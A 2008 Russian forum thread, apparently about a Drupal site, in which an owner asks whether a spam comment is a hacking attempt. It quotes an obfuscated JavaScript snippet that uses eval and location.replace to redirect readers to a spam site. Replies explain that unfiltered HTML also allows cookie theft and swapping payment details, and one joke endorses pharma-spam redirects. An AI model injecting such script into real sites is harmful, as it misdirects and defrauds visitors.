6 апреля 2008 в 15:08
Отправили вот такие коменты.
IP Address: 89.41.87.241
Name: Anonymous
Email address: play123@mail.ru
URL: Comment:
Name: Anonymous
Email address: play123@mail.ru
URL: Comment:
<SCRIPT language=JavaScript>
var oou = "location.";
var ouu = "replace('h";
var .uc = "ine.net/co";
var ouu = "mment/repl";
var cb. = "y/91')";
var obu = "ttp://best";
var cb. = "libraryonl";
eval(oou+ouu+obu+cb.+.uc+ouu+cb.);
</SCRIPT>
Что это попытка взлома?
Комментарии
Не совсем взлом, вашему сайту угрожает только потеря посетителей. Если фильтрация HTML не включена и SCRIPT не запрещен, то пользователь будет перенаправлен на bestine.net
Но практически также можно похитить куки пользователя (что часто практически равносильно взлому пользовательского, в том числе админского, аккаунта) или полностью (частично) заменить содержимое страницы, например номера webmoney кошельков или адрес ссылки "оформить заказ", пользователь может и не проверить аттестат или не обратить внимание, что адрес сайта уже сменился
>Если фильтрация HTML не включена и SCRIPT не запрещен
А по умолчанию это включено чтоли в движке?
По умолчанию нет, но часто не знают о последствиях, думая, например, что Full HTML просто позволяет линки вставлять да текст форматировать как угодно
По умолчанию нет, но часто не знают о последствиях, думая, например, что Full HTML просто позволяет линки вставлять да текст форматировать как угодно
Находка для дорвейной братии... Редирект buy phentermine online на umaxsearch так и просится
А как же быть, если нужно использовать модуль imce ???
Ведь этот модуль не будет работать, если не включен Full HTML....
подумайте и заберите свои слова обратно